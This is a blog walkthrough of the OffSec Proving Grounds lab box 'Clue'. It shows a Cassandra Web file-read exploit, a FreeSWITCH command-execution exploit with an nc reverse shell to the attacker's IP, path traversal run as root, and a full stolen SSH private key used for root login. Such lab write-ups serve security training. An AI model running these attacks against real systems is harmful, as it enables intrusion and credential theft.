Skip to main content
  1. Posts/

OFFSEC - Proving Grounds - CLUE

·2651 words·13 mins·
OSCP OFFSEC PG PRACTICE CASSANDRA WEB FREESWITCH
Author
Table of Contents

Summary
#

On port 3000 the is an application running called Cassandra Web. Using searchsploit we find a remote file read exploit wich allows us to read the credentials of the cassie user from the /proc/self/cmdline arguments for the current process. Next, we’re able to find the password used within the event_socket.conf.xml script. Using these credentials we can get RCE using freeswitch available on port 8021 and initial access. Once access, switch to the cassie user which can run the /usr/local/bin/cassandra-web binary as root without a password. Running a new instance of cassandra web on port 3001 allows us to read files on the filesystem as root. Within the .bash_history of the anthony user it becomes clear the RSA key is also allowed to log into the target as the root user. Once we copy the RSA key we’re able to log into the target as the root user and escalate our privileges.

Specifications
#

  • Name: CLUE
  • Platform: PG PRACTICE
  • Points: 25
  • Difficulty: Hard
  • OS: Linux clue 4.19.0-21-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64 GNU/Linux
  • IP address: 192.168.141.240
  • OFFSEC provided credentials: None
  • HASH: local.txt:c1db661df29cd6a498017d93df754fef
  • HASH: proof.txt:3d14cda55e23b0583df380684f0f803f

Preparation
#

First we’ll create a directory structure for our files, set the IP address to a bash variable and ping the target:

## create directory structure
mkdir clue && cd clue && mkdir enum files exploits uploads tools

## list directory
ls -la

total 28
drwxrwxr-x  7 kali kali 4096 Aug 15 08:47 .
drwxrwxr-x 23 kali kali 4096 Aug 15 08:47 ..
drwxrwxr-x  2 kali kali 4096 Aug 15 08:47 enum
drwxrwxr-x  2 kali kali 4096 Aug 15 08:47 exploits
drwxrwxr-x  2 kali kali 4096 Aug 15 08:47 files
drwxrwxr-x  2 kali kali 4096 Aug 15 08:47 tools
drwxrwxr-x  2 kali kali 4096 Aug 15 08:47 uploads

## set bash variable
ip=192.168.141.240

## ping target to check if it's online
ping $ip

PING 192.168.141.240 (192.168.141.240) 56(84) bytes of data.
64 bytes from 192.168.141.240: icmp_seq=1 ttl=61 time=19.8 ms
64 bytes from 192.168.141.240: icmp_seq=2 ttl=61 time=17.0 ms
^C
--- 192.168.141.240 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 17.034/18.420/19.807/1.386 ms

Reconnaissance
#

Portscanning
#

Using Rustscan we can see what TCP ports are open. This tool is part of my default portscan flow.

## run the rustscan tool
sudo rustscan -a $ip | tee enum/rustscan

.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Breaking and entering... into the world of open ports.

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.141.240:22
Open 192.168.141.240:80
Open 192.168.141.240:139
Open 192.168.141.240:445
Open 192.168.141.240:3000
Open 192.168.141.240:8021
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-15 08:51 CEST
Initiating Ping Scan at 08:51
Scanning 192.168.141.240 [4 ports]
Completed Ping Scan at 08:51, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:51
Completed Parallel DNS resolution of 1 host. at 08:51, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 08:51
Scanning 192.168.141.240 [6 ports]
Discovered open port 22/tcp on 192.168.141.240
Discovered open port 139/tcp on 192.168.141.240
Discovered open port 445/tcp on 192.168.141.240
Discovered open port 80/tcp on 192.168.141.240
Discovered open port 3000/tcp on 192.168.141.240
Discovered open port 8021/tcp on 192.168.141.240
Completed SYN Stealth Scan at 08:51, 0.05s elapsed (6 total ports)
Nmap scan report for 192.168.141.240
Host is up, received echo-reply ttl 61 (0.018s latency).
Scanned at 2025-08-15 08:51:07 CEST for 0s

PORT     STATE SERVICE      REASON
22/tcp   open  ssh          syn-ack ttl 61
80/tcp   open  http         syn-ack ttl 61
139/tcp  open  netbios-ssn  syn-ack ttl 61
445/tcp  open  microsoft-ds syn-ack ttl 61
3000/tcp open  ppp          syn-ack ttl 61
8021/tcp open  ftp-proxy    syn-ack ttl 61

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds
           Raw packets sent: 10 (416B) | Rcvd: 7 (292B)

Copy the output of open ports into a file called ports within the files directory.

## edit the ``files/ports` file
nano files/ports

## content `ports` file:
22/tcp   open  ssh          syn-ack ttl 61
80/tcp   open  http         syn-ack ttl 61
139/tcp  open  netbios-ssn  syn-ack ttl 61
445/tcp  open  microsoft-ds syn-ack ttl 61
3000/tcp open  ppp          syn-ack ttl 61
8021/tcp open  ftp-proxy    syn-ack ttl 61

Run the following command to get a string of all open ports and use the output of this command to paste within NMAP:

## get a list, comma separated of the open port(s)
cd files && cat ports | cut -d '/' -f1 > ports.txt && awk '{printf "%s,",$0;n++}' ports.txt | sed 's/.$//' > ports && rm ports.txt && cat ports && cd ..

## output previous command
22,80,139,445,3000,8021

## use this output in the `nmap` command below:
sudo nmap -T3 -p 22,80,139,445,3000,8021 -sCV -vv $ip -oN enum/nmap-services-tcp

Output of NMAP:

PORT     STATE SERVICE          REASON         VERSION
22/tcp   open  ssh              syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGGcX/x/M6J7Y0V8EeUt0FqceuxieEOe2fUH2RsY3XiSxByQWNQi+XSrFElrfjdR2sgnauIWWhWibfD+kTmSP5gkFcaoSsLtgfMP/2G8yuxPSev+9o1N18gZchJneakItNTaz1ltG1W//qJPZDHmkDneyv798f9ZdXBzidtR5/+2ArZd64bldUxx0irH0lNcf+ICuVlhOZyXGvSx/ceMCRozZrW2JQU+WLvs49gC78zZgvN+wrAZ/3s8gKPOIPobN3ObVSkZ+zngt0Xg/Zl11LLAbyWX7TupAt6lTYOvCSwNVZURyB1dDdjlMAXqT/Ncr4LbP+tvsiI1BKlqxx4I2r
|   256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCpAb2jUKovAahxmPX9l95Pq9YWgXfIgDJw0obIpOjOkdP3b0ukm/mrTNgX2lg1mQBMlS3lzmQmxeyHGg9+xuJA=
|   256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIE0omUJRIaMtPNYa4CKBC+XUzVyZsJ1QwsksjpA/6Ml+
80/tcp   open  http             syn-ack ttl 61 Apache httpd 2.4.38
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.38 (Debian)
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
139/tcp  open  netbios-ssn      syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn      syn-ack ttl 61 Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3000/tcp open  http             syn-ack ttl 61 Thin httpd
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: Cassandra Web
|_http-server-header: thin
|_http-favicon: Unknown favicon MD5: 68089FD7828CD453456756FE6E7C4FD8
8021/tcp open  freeswitch-event syn-ack ttl 61 FreeSWITCH mod_event_socket
Service Info: Hosts: 127.0.0.1, CLUE; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-08-15T06:51:59
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 50076/tcp): CLEAN (Timeout)
|   Check 2 (port 42766/tcp): CLEAN (Timeout)
|   Check 3 (port 38393/udp): CLEAN (Timeout)
|   Check 4 (port 18016/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 1h19m52s, deviation: 2h18m35s, median: -8s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: clue
|   NetBIOS computer name: CLUE\x00
|   Domain name: pg
|   FQDN: clue.pg
|_  System time: 2025-08-15T02:51:57-04:00

Initial Access
# 

3000/tcp open  http             syn-ack ttl 61 Thin httpd
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: Cassandra Web
|_http-server-header: thin
|_http-favicon: Unknown favicon MD5: 68089FD7828CD453456756FE6E7C4FD8

8021/tcp open  freeswitch-event syn-ack ttl 61 FreeSWITCH mod_event_socket

On port 3000, once we visit it in a browser, there is an application running called Cassandra Web.

Using searchsploit we find a Remote File Read exploit which allows us to read files of the target filesystem. So, copy the exploit locally and test this out. Indeed we can read files from the filesystem. Now, read the startup arguments of the current process. This will reveal the credentials of the cassie user, cassie:SecondBiteTheApple330

## search for `Cassandra Web` using searchsploit
searchsploit cassandra web
----------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                         |  Path
----------------------------------------------------------------------- ---------------------------------
Cassandra Web 0.5.0 - Remote File Read                                 | linux/webapps/49362.py
----------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

## change directory
cd exploits

## mirror the exploit locally
searchsploit -m linux/webapps/49362.py
  Exploit: Cassandra Web 0.5.0 - Remote File Read
      URL: https://www.exploit-db.com/exploits/49362
     Path: /usr/share/exploitdb/exploits/linux/webapps/49362.py
    Codes: N/A
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/hk/offsec/pg/practice/clue/exploits/49362.py

## test the exploit on a known file `/etc/passwd`
python3 49362.py -p 3000 $ip /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ntp:x:106:113::/nonexistent:/usr/sbin/nologin
cassandra:x:107:114:Cassandra database,,,:/var/lib/cassandra:/usr/sbin/nologin
cassie:x:1000:1000::/home/cassie:/bin/bash
freeswitch:x:998:998:FreeSWITCH:/var/lib/freeswitch:/bin/false
anthony:x:1001:1001::/home/anthony:/bin/bash

## print the startup arguments of the current process
python3 49362.py -p 3000 $ip /proc/self/cmdline                                    
/usr/bin/ruby2.5/usr/local/bin/cassandra-web-ucassie-pSecondBiteTheApple330

On port 8021 there is an application running called freeswitch. When we look on the internet we can find the location of and XML configuration file used by freeswitch: https://developer.signalwire.com/freeswitch/FreeSWITCH-Explained/Modules/mod_event_socket_1048924/#Configuration. Reading this XML file we find a password: StrongClueConEight021. Next, when we use searchsploit to look for existing exploits for the Freeswitch application and we find a RCE exploit. Copy this exploit locally, adapt it with the found credential and run the exploit to get remote code execution as the freeswitch user.

## read the XML config file
python3 49362.py -p 3000 $ip /etc/freeswitch/autoload_configs/event_socket.conf.xml

<configuration name="event_socket.conf" description="Socket Client">
  <settings>
    <param name="nat-map" value="false"/>
    <param name="listen-ip" value="0.0.0.0"/>
    <param name="listen-port" value="8021"/>
    <param name="password" value="StrongClueConEight021"/>
  </settings>
</configuration>

## using searchsploit to find the RCE exploit
searchsploit freeswitch           
----------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                         |  Path
----------------------------------------------------------------------- ---------------------------------
FreeSWITCH - Event Socket Command Execution (Metasploit)               | multiple/remote/47698.rb
FreeSWITCH 1.10.1 - Command Execution                                  | windows/remote/47799.txt
----------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

## copy the exploit locally
searchsploit -m windows/remote/47799.txt
  Exploit: FreeSWITCH 1.10.1 - Command Execution
      URL: https://www.exploit-db.com/exploits/47799
     Path: /usr/share/exploitdb/exploits/windows/remote/47799.txt
    Codes: N/A
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/hk/offsec/pg/practice/clue/exploits/47799.txt

## rename the exploit from .txt to .py
mv 47799.txt 47799.py

## edit the exploit and only change the password to the password we found 
<SNIP>
PASSWORD='StrongClueConEight021' # default password for FreeSWITCH
<SNIP>

## run the exploit 
python3 47799.py $ip whoami             
Authenticated
Content-Type: api/response
Content-Length: 11

freeswitch

Now we need to get a reverse shell. First, get the local IP address, setup a local listener and execute the exploit to get a reverse shell on the target as the freeswitch user.

## get the local IP address on tun0
ip a | grep -A 10 tun0
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
    link/none 
    inet 192.168.45.204/24 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 fe80::c36:35f1:8cdf:ff6d/64 scope link stable-privacy proto kernel_ll 
       valid_lft forever preferred_lft forever

## setup a local listener on a known open port
nc -lvnp 3000  
listening on [any] 3000 ...

## execute the exploit
python3 47799.py $ip 'nc 192.168.45.204 3000 -e /usr/bin/sh'
Authenticated

## catch the reverse shell
nc -lvnp 3000
listening on [any] 3000 ...
connect to [192.168.45.204] from (UNKNOWN) [192.168.141.240] 47908

## print the current working directory
pwd
/

## print the current user
whoami
freeswitch

## find `local.txt`
find / -iname 'local.txt' 2>/dev/null
/var/lib/freeswitch/local.txt

## print 
cat /var/lib/freeswitch/local.txt
c1db661df29cd6a498017d93df754fef

Privilege Escalation
#

To get a proper TTY we upgrade our shell using the script binary.

## determine location script binary
which script
/usr/bin/script

## start the script binary, after that press CTRL+Z
/usr/bin/script -qc /bin/bash /dev/null

## after this command press the `enter` key twice
stty raw -echo ; fg ; reset

## run the following to be able to clear the screen and set the terrminal correct
freeswitch@clue:/home/cassie$ export TERM=xterm
freeswitch@clue:/home/cassie$ stty columns 200 rows 200

Uploading and running linpeas.sh doesn’t reveal that much., but we do have the credentials of the cassie user, namely: cassie:SecondBiteTheApple330. So switch to that user. Listing the sudo privileges shows this user can run the /usr/local/bin/cassandra-web as root without a password, so let’s run it as root on port 3001 and use the & to run the process in the background, otherwise our reverse shell would hang on the running process. Now print the proof.txt file. Unfortunately, the file is there (so we can read files as the root user), but they changed the content of the file to The proof is in another file.

## switch to the `cassie` user and paste the password when asked 
freeswitch@clue:/var/tmp$ su cassie
Password: 

## list sudo privileges
cassie@clue:/var/tmp$ sudo -l
Matching Defaults entries for cassie on clue:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User cassie may run the following commands on clue:
    (ALL) NOPASSWD: /usr/local/bin/cassandra-web

## start cassandra-web on port 3001
cassie@clue:/var/tmp$ sudo /usr/local/bin/cassandra-web -B localhost:3001 -u cassie -p SecondBiteTheApple330 &

I, [2025-08-15T03:48:21.990195 #24997]  INFO -- : Establishing control connection
I, [2025-08-15T03:48:22.067272 #24997]  INFO -- : Refreshing connected host's metadata
I, [2025-08-15T03:48:22.071215 #24997]  INFO -- : Completed refreshing connected host's metadata
I, [2025-08-15T03:48:22.071677 #24997]  INFO -- : Refreshing peers metadata
I, [2025-08-15T03:48:22.072577 #24997]  INFO -- : Completed refreshing peers metadata
I, [2025-08-15T03:48:22.072601 #24997]  INFO -- : Refreshing schema
I, [2025-08-15T03:48:22.102152 #24997]  INFO -- : Schema refreshed
I, [2025-08-15T03:48:22.102177 #24997]  INFO -- : Control connection established
I, [2025-08-15T03:48:22.102327 #24997]  INFO -- : Creating session
I, [2025-08-15T03:48:22.189692 #24997]  INFO -- : Session created
2025-08-15 03:48:22 -0400 Thin web server (v1.8.1 codename Infinite Smoothie)
2025-08-15 03:48:22 -0400 Maximum connections set to 1024
2025-08-15 03:48:22 -0400 Listening on localhost:3001, CTRL+C to stop

## print `proof.txt`
cassie@clue:/var/tmp$ curl --path-as-is http://localhost:3001/../../../../../../../../root/proof.txt
The proof is in another file

Using root privileges for reading files on the filesystem we can read the bash history of the anthony user. This shows that this RSA key is also allowed for the root user. So we print the RSA key of anthony, copy the content locally to a file, set the correct permissions, log in the target as the root user using SSH and find/print the proof hash.

## read the bash history of the `anthony` user
cassie@clue:/var/tmp$ curl --path-as-is http://localhost:3001/../../../../../../../../home/anthony/.bash_history
clear
ls -la
ssh-keygen
cp .ssh/id_rsa.pub .ssh/authorized_keys
sudo cp .ssh/id_rsa.pub /root/.ssh/authorized_keys
exit

## print the RSA key in the .ssh directory under the `anthony` user.
cassie@clue:/var/tmp$ curl --path-as-is http://localhost:3001/../../../../../../../../home/anthony/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAw59iC+ySJ9F/xWp8QVkvBva2nCFikZ0VT7hkhtAxujRRqKjhLKJe
d19FBjwkeSg+PevKIzrBVr0JQuEPJ1C9NCxRsp91xECMK3hGh/DBdfh1FrQACtS4oOdzdM
jWyB00P1JPdEM4ojwzPu0CcduuV0kVJDndtsDqAcLJr+Ls8zYo376zCyJuCCBonPVitr2m
B6KWILv/ajKwbgrNMZpQb8prHL3lRIVabjaSv0bITx1KMeyaya+K+Dz84Vu8uHNFJO0rhq
gBAGtUgBJNJWa9EZtwws9PtsLIOzyZYrQTOTq4+q/FFpAKfbsNdqUe445FkvPmryyx7If/
DaMoSYSPhwAAA8gc9JxpHPScaQAAAAdzc2gtcnNhAAABAQDDn2IL7JIn0X/FanxBWS8G9r
acIWKRnRVPuGSG0DG6NFGoqOEsol53X0UGPCR5KD4968ojOsFWvQlC4Q8nUL00LFGyn3XE
QIwreEaH8MF1+HUWtAAK1Lig53N0yNbIHTQ/Uk90QziiPDM+7QJx265XSRUkOd22wOoBws
mv4uzzNijfvrMLIm4IIGic9WK2vaYHopYgu/9qMrBuCs0xmlBvymscveVEhVpuNpK/RshP
HUox7JrJr4r4PPzhW7y4c0Uk7SuGqAEAa1SAEk0lZr0Rm3DCz0+2wsg7PJlitBM5Orj6r8
UWkAp9uw12pR7jjkWS8+avLLHsh/8NoyhJhI+HAAAAAwEAAQAAAQBjswJsY1il9I7zFW9Y
etSN7wVok1dCMVXgOHD7iHYfmXSYyeFhNyuAGUz7fYF1Qj5enqJ5zAMnataigEOR3QNg6M
mGiOCjceY+bWE8/UYMEuHR/VEcNAgY8X0VYxqcCM5NC201KuFdReM0SeT6FGVJVRTyTo+i
CbX5ycWy36u109ncxnDrxJvvb7xROxQ/dCrusF2uVuejUtI4uX1eeqZy3Rb3GPVI4Ttq0+
0hu6jNH4YCYU3SGdwTDz/UJIh9/10OJYsuKcDPBlYwT7mw2QmES3IACPpW8KZAigSLM4fG
Y2Ej3uwX8g6pku6P6ecgwmE2jYPP4c/TMU7TLuSAT9TpAAAAgG46HP7WIX+Hjdjuxa2/2C
gX/VSpkzFcdARj51oG4bgXW33pkoXWHvt/iIz8ahHqZB4dniCjHVzjm2hiXwbUvvnKMrCG
krIAfZcUP7Ng/pb1wmqz14lNwuhj9WUhoVJFgYk14knZhC2v2dPdZ8BZ3dqBnfQl0IfR9b
yyQzy+CLBRAAAAgQD7g2V+1vlb8MEyIhQJsSxPGA8Ge05HJDKmaiwC2o+L3Er1dlktm/Ys
kBW5hWiVwWoeCUAmUcNgFHMFs5nIZnWBwUhgukrdGu3xXpipp9uyeYuuE0/jGob5SFHXvU
DEaXqE8Q9K14vb9by1RZaxWEMK6byndDNswtz9AeEwnCG0OwAAAIEAxxy/IMPfT3PUoknN
Q2N8D2WlFEYh0avw/VlqUiGTJE8K6lbzu6M0nxv+OI0i1BVR1zrd28BYphDOsAy6kZNBTU
iw4liAQFFhimnpld+7/8EBW1Oti8ZH5Mx8RdsxYtzBlC2uDyblKrG030Nk0EHNpcG6kRVj
4oGMJpv1aeQnWSUAAAAMYW50aG9ueUBjbHVlAQIDBAUGBw==
-----END OPENSSH PRIVATE KEY-----

## change directory
cd files

## create a file called `rsa.key` with the following content
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAw59iC+ySJ9F/xWp8QVkvBva2nCFikZ0VT7hkhtAxujRRqKjhLKJe
d19FBjwkeSg+PevKIzrBVr0JQuEPJ1C9NCxRsp91xECMK3hGh/DBdfh1FrQACtS4oOdzdM
jWyB00P1JPdEM4ojwzPu0CcduuV0kVJDndtsDqAcLJr+Ls8zYo376zCyJuCCBonPVitr2m
B6KWILv/ajKwbgrNMZpQb8prHL3lRIVabjaSv0bITx1KMeyaya+K+Dz84Vu8uHNFJO0rhq
gBAGtUgBJNJWa9EZtwws9PtsLIOzyZYrQTOTq4+q/FFpAKfbsNdqUe445FkvPmryyx7If/
DaMoSYSPhwAAA8gc9JxpHPScaQAAAAdzc2gtcnNhAAABAQDDn2IL7JIn0X/FanxBWS8G9r
acIWKRnRVPuGSG0DG6NFGoqOEsol53X0UGPCR5KD4968ojOsFWvQlC4Q8nUL00LFGyn3XE
QIwreEaH8MF1+HUWtAAK1Lig53N0yNbIHTQ/Uk90QziiPDM+7QJx265XSRUkOd22wOoBws
mv4uzzNijfvrMLIm4IIGic9WK2vaYHopYgu/9qMrBuCs0xmlBvymscveVEhVpuNpK/RshP
HUox7JrJr4r4PPzhW7y4c0Uk7SuGqAEAa1SAEk0lZr0Rm3DCz0+2wsg7PJlitBM5Orj6r8
UWkAp9uw12pR7jjkWS8+avLLHsh/8NoyhJhI+HAAAAAwEAAQAAAQBjswJsY1il9I7zFW9Y
etSN7wVok1dCMVXgOHD7iHYfmXSYyeFhNyuAGUz7fYF1Qj5enqJ5zAMnataigEOR3QNg6M
mGiOCjceY+bWE8/UYMEuHR/VEcNAgY8X0VYxqcCM5NC201KuFdReM0SeT6FGVJVRTyTo+i
CbX5ycWy36u109ncxnDrxJvvb7xROxQ/dCrusF2uVuejUtI4uX1eeqZy3Rb3GPVI4Ttq0+
0hu6jNH4YCYU3SGdwTDz/UJIh9/10OJYsuKcDPBlYwT7mw2QmES3IACPpW8KZAigSLM4fG
Y2Ej3uwX8g6pku6P6ecgwmE2jYPP4c/TMU7TLuSAT9TpAAAAgG46HP7WIX+Hjdjuxa2/2C
gX/VSpkzFcdARj51oG4bgXW33pkoXWHvt/iIz8ahHqZB4dniCjHVzjm2hiXwbUvvnKMrCG
krIAfZcUP7Ng/pb1wmqz14lNwuhj9WUhoVJFgYk14knZhC2v2dPdZ8BZ3dqBnfQl0IfR9b
yyQzy+CLBRAAAAgQD7g2V+1vlb8MEyIhQJsSxPGA8Ge05HJDKmaiwC2o+L3Er1dlktm/Ys
kBW5hWiVwWoeCUAmUcNgFHMFs5nIZnWBwUhgukrdGu3xXpipp9uyeYuuE0/jGob5SFHXvU
DEaXqE8Q9K14vb9by1RZaxWEMK6byndDNswtz9AeEwnCG0OwAAAIEAxxy/IMPfT3PUoknN
Q2N8D2WlFEYh0avw/VlqUiGTJE8K6lbzu6M0nxv+OI0i1BVR1zrd28BYphDOsAy6kZNBTU
iw4liAQFFhimnpld+7/8EBW1Oti8ZH5Mx8RdsxYtzBlC2uDyblKrG030Nk0EHNpcG6kRVj
4oGMJpv1aeQnWSUAAAAMYW50aG9ueUBjbHVlAQIDBAUGBw==
-----END OPENSSH PRIVATE KEY-----

## set the correct permissions so we can use this key within the SSH command   
chmod 600 rsa.key 

## log in the target as the `root` user using SSH
ssh -i rsa.key root@$ip 
The authenticity of host '192.168.141.240 (192.168.141.240)' can't be established.
ED25519 key fingerprint is SHA256:mqPCrimr9j626KOGoHM+qxgHUOYD4pu1+4KzhIvu5uA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.141.240' (ED25519) to the list of known hosts.
Linux clue 4.19.0-21-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Apr 29 17:57:54 2024
root@clue:~# 

## list the current directory
root@clue:~# ls -la
total 52
drwx------  7 root root 4096 Aug 15 02:45 .
drwxr-xr-x 18 root root 4096 Aug  5  2022 ..
lrwxrwxrwx  1 root root    9 Aug  5  2022 .bash_history -> /dev/null
-rw-r--r--  1 root root  595 Oct 27  2020 .bashrc
drwxr-xr-x  2 root root 4096 Aug  5  2022 .cassandra
drwxr-xr-x  3 root root 4096 Aug  5  2022 .gem
-rw-r--r--  1 root root   27 Aug  5  2022 .gemrc
drwx------  3 root root 4096 Aug 11  2022 .gnupg
drwxr-xr-x  3 root root 4096 Oct 27  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root   29 Aug  5  2022 proof.txt
-rw-------  1 root root   33 Aug 15 02:46 proof_youtriedharder.txt
-rwxr-xr-x  1 root root  223 Apr 29  2024 smbd.sh
drwxr-xr-x  2 root root 4096 Aug  5  2022 .ssh

## print the proof hash
root@clue:~# cat proof_youtriedharder.txt
3d14cda55e23b0583df380684f0f803f

References
#

[+] https://developer.signalwire.com/freeswitch/FreeSWITCH-Explained/Modules/mod_event_socket_1048924/#Configuration

Related

OFFSEC - Proving Grounds - EXTPLORER
·2183 words·11 mins
OSCP OFFSEC PG PRACTICE EXTPLORER HASHCAT GROUP_DISK
eXtplorer application on port 80 with weak credentials which allows PHP reverse shell. As www-data, we can’t read local.txt. Crack dora’s hash, switch to dora in disk group, read proof.txt.
OFFSEC - Proving Grounds - FLU
·2189 words·11 mins
OSCP OFFSEC PG PRACTICE CONFLUENCE PSPY
Atlassian Confluence 7.13.6 on port 8090 has CVE-2022-26134 exploit for initial access. Add reverse shell to script for root privileges.
OFFSEC - Proving Grounds - PRESS
·1465 words·7 mins
OSCP OFFSEC PG PRACTICE MAGIC BYTE
FlatPress on port 8089 allows login with weak credentials, PHP reverse shell upload via GIF magic byte, and privilege escalation to root using sudo apt-get.
OFFSEC - Proving Grounds - CODO
·1430 words·7 mins
OSCP OFFSEC PG PRACTICE CODOFORUM GOBUSTER
Codoforum on port 80 uses weak credentials. Exploit CVE-2022-31854 to upload malicious PHP logo, gain initial access and find root password in /var/www/html.
OFFSEC - Proving Grounds - CRANE
·1529 words·8 mins
OSCP OFFSEC PG PRACTICE SUITECRM
SuiteCRM on port 80 has weak admin:admin credentials. Use CVE-2022–23940 for RCE, then escalate to root via sudo /usr/sbin/service
OFFSEC - Proving Grounds - FIRED
·1658 words·8 mins
OSCP OFFSEC PG PRACTICE OPENFIRE
OpenFire 4.7.3 on port 9090 is vulnerable to CVE-2023-32315. Exploit and upload a .jar plugin for RCE. Root password found in script file to escalate privileges.